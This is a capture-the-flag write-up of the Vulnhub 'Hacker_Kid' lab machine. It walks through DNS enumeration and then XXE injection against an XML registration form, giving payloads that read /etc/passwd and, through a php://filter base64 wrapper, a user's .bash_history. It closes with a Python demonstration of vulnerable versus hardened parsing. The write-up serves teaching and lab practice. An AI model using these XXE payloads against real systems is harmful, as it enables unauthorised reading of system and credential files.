Capture the Flag: Hacker_Kid Machine Exploitation Guide

Platform: VirtualBox

Attacker System: Kali Linux (IP: 10.0.2.15)

Target System: Hacker_Kid (IP: 10.0.2.42)

Objective: Obtain root privileges and capture the flag.

Reconnaissance and Scanning

Initial host discovery was performed using Nmap to identify the target IP address. Subsequently, a port scan revealed three open services:

  • Port 53 (DNS)
  • Port 80 (HTTP)
  • Port 9999 (HTTP)

Investigating port 80 yielded no immediate actionable vulnerabilities. Shifting focus to port 9999, a login portal was discovered. Inspection of the page source code revealed a developer comment suggesting the use of a specific GET parameter for navigation.

<!-- Debug: use 'page_index' parameter to view other pages -->

Attempting to access ?page_index=1 displayed a page with a vague message encouraging "digging deeper." Using Burp Suite to fuzz the parameter value, a hidden page was discovered at page_index=21.

This hidden page contained a message hinting at subdomain usage:

Message: "I created several subdomains to maintain access. For example: hackers.blackhat.local"

Since port 53 (DNS) is open, a DNS zone transfer attack was attempted using dig to enumerate further subdomains.

dig @10.0.2.42 hackers.blackhat.local

The query revealed a new subdomain: hackerkid.blackhat.local. The following entries were added to the local DNS resolution file (/etc/hosts) on the attacker machine:

10.0.2.42    hackerkid.blackhat.local
10.0.2.42    blackhat.local

Navigating to the new subdomain exposed a user registration form.

Vulnerability Analysis and Exploitation

Capturing the registration request with Burp Suite revealed that the data is transmitted in XML format. This presents a potential vector for XML External Entity (XXE) injection.

Since the application echoes the email value back in the response, the result of an XXE payload is directly visible, so a payload can be constructed to read local files. The following payload was crafted to read the /etc/passwd file (the entity xxe is declared in the DOCTYPE and referenced from the email field):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
    <name>admin</name>
    <email>&xxe;</email>
    <password>password123</password>
</user>

The injection was successful, returning the contents of /etc/passwd. The output identified two users with shell access:

root:x:0:0:root:/root:/bin/bash
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash

Efforts then shifted to reading sensitive files belonging to the user 'saket'. Reading files such as .bash_history directly failed with XML parsing errors, because characters in their content are not well-formed inside an XML entity. To bypass this, the php://filter wrapper was used to base64-encode the file content before it is returned, so the parser only ever sees base64 characters (the payload below uses .bash_history in saket's home directory as the example file):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/home/saket/.bash_history">
]>
<user>
    <name>admin</name>
    <email>&xxe;</email>
    <password>password123</password>
</user>

This allowed for the successful extraction and decoding of sensitive user configuration files for further analysis.
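As an added example (not code from this write-up or from the box), the following Python reproduces the mechanism above against a constructed local file: with external entity resolution enabled the parser splices the file into the echoed email field, with it disabled the field comes back empty, and a pre-parse gate rejects any registration request that carries a DTD at all. It assumes only the standard-library xml.sax parser; the temp file and the payload are constructed stand-ins.

```python
"""Vulnerable vs. hardened parsing of the write-up's registration XML (added
example, not the box's code; a temp file stands in for /etc/passwd)."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges

# Constructed stand-in for /etc/passwd (one line of the output shown above).
SECRET_FILE = os.path.join(tempfile.mkdtemp(), "passwd")
with open(SECRET_FILE, "w") as fh:
    fh.write("root:x:0:0:root:/root:/bin/bash\n")

def xxe_payload(target_path: str) -> bytes:
    """Constructed copy of the payload above, entity pointed at target_path."""
    return (b'<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE user [ '
            b'<!ENTITY xxe SYSTEM "file://' + target_path.encode() + b'"> ]>\n'
            b'<user><name>admin</name><email>&xxe;</email>'
            b'<password>password123</password></user>\n')

class _Fields(xml.sax.ContentHandler):
    """Collects each element's text, as the app does before echoing <email>."""
    def __init__(self):
        super().__init__()
        self.fields, self._cur = {}, None
    def startElement(self, name, attrs):
        self._cur, self.fields[name] = name, ""
    def characters(self, data):
        if self._cur:
            self.fields[self._cur] += data
    def endElement(self, name):
        self._cur = None

def parse_registration(xml_bytes: bytes, resolve_external: bool) -> dict:
    """resolve_external=True mirrors the vulnerable server; False is the fix."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)  # True: expat fetches the SYSTEM id
    handler = _Fields()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return {k: v.strip() for k, v in handler.fields.items()}

def rejects_dtd(xml_bytes: bytes) -> bool:
    """Pre-parse gate: registration XML never needs a DTD, so drop and log it."""
    return any(tag in xml_bytes.upper() for tag in (b"<!DOCTYPE", b"<!ENTITY"))

if __name__ == "__main__":
    p = xxe_payload(SECRET_FILE)
    print("vulnerable:", parse_registration(p, True)["email"])
    print("hardened:", repr(parse_registration(p, False)["email"]), "gate:", rejects_dtd(p))
```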

Tags: xxe Vulnhub penetration-testing dns-enumeration CTF

Posted on Fri, 15 May 2026 03:23:57 +0000 by beanwebb